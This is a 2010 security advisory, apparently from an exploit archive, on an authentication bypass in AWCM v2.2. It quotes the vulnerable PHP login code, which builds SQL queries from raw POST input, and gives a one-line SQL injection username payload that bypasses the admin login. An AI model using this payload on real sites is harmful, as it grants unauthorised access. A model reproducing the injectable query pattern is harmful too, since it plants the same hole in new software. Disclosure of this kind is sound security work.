AWCM v2.2 Auth Bypass Vulnerabilities

2010.11.18
Credit: eidelweiss
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

######################################################## AWCM v2.2 Auth Bypass Vulnerabilities ######################################################## ____ __ __ __ /\ _`\ /\ \ __ /\ \__/\ \ \ \ \L\_\__ __ ___\ \ \/'\ /\_\ ___ __ \ \ ,_\ \ \___ __ \ \ _\/\ \/\ \ /'___\ \ , < \/\ \ /' _ `\ /'_ `\ \ \ \/\ \ _ `\ /'__`\ \ \ \/\ \ \_\ \/\ \__/\ \ \\`\\ \ \/\ \/\ \/\ \L\ \ \ \ \_\ \ \ \ \/\ __/ \ \_\ \ \____/\ \____\\ \_\ \_\ \_\ \_\ \_\ \____ \ \ \__\\ \_\ \_\ \____\ \/_/ \/___/ \/____/ \/_/\/_/\/_/\/_/\/_/\/___L\ \ \/__/ \/_/\/_/\/____/ /\____/ \_/__/ __ __ __ ______ By:eidelweiss /\ \ __/\ \ /\ \ /\ _ \ \ \ \/\ \ \ \ __\ \ \____ \ \ \L\ \ _____ _____ ____ \ \ \ \ \ \ \ /'__`\ \ '__`\ \ \ __ \/\ '__`\/\ '__`\ /',__\ \ \ \_/ \_\ \/\ __/\ \ \L\ \ \ \ \/\ \ \ \L\ \ \ \L\ \/\__, `\ \ `\___x___/\ \____\\ \_,__/ \ \_\ \_\ \ ,__/\ \ ,__/\/\____/ '\/__//__/ \/____/ \/___/ \/_/\/_/\ \ \/ \ \ \/ \/___/ \ \_\ \ \_\ \/_/ \/_/ [+]Script: AWCM [+]Version: 2.2 final [+]Download: http://sourceforge.net/projects/awcm/files/AWCM%20v2.2/AWCM%20v2.2%20final.zip/download ######################################################## [!]Author : eidelweiss [!]Contact: eidelweiss[at]windowslive[dot]com [!]Blog: http://eidelweiss-advisories.blogspot.com [!]Gratz : DealCyber member`s , yogyacarderlink crew , and YOU !!! Original Advisories: http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html ######################################################## -=[Description]=- ar web content manager is a free web contemts management system (cms) built with php , mysql , css , javascript , css to allow you to manage your website easily and fast. it contains many main categories such as (videos, topics, sounds, photo gallery. ######################################################## -=[VUln Code]=- first lets we see the code on login.php file ********************************** <?php include ("header.php"); $pusername = $_POST['username']; $ppassword = md5($_POST['password']); $premember = $_POST['remember']; $mysql_login547_query = mysql_query("SELECT username,password,id FROM awcm_members WHERE username = '$pusername' AND password = '$ppassword'"); $mysql_login547_total = mysql_num_rows($mysql_login547_query); $mysql_login547_row = mysql_fetch_array($mysql_login547_query); --------- ********************************** ok, now we see the code in control/login.php file and on this file i see the vulnerability code that can be used by attacker or anonymous to bypass the login section.. its also possible to gain the administrator access ( if you lucky ofcourse :D ) here the code on control/login.php file: ********************************** <?php $page = 'login'; include ("common.php"); if(isset($_GET['do'])) { $user = $_POST['username']; // <= i dont give fuck $pass = md5($_POST['password']); // $cp_login_query = mysql_query("SELECT id,username,password,level FROM awcm_members WHERE level = 'admin' AND username = '$user' AND password = '$pass'"); $cp_login_total = mysql_num_rows($cp_login_query); ********************************** ######################################################## -=[ How To Exploit / P0C ]=- put as username : 'or 1=1/* =========================| -=[ E0F ]=- |============================

References:

http://eidelweiss-advisories.blogspot.com/2010/11/awcm-v22-auth-bypass-vulnerabilities.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top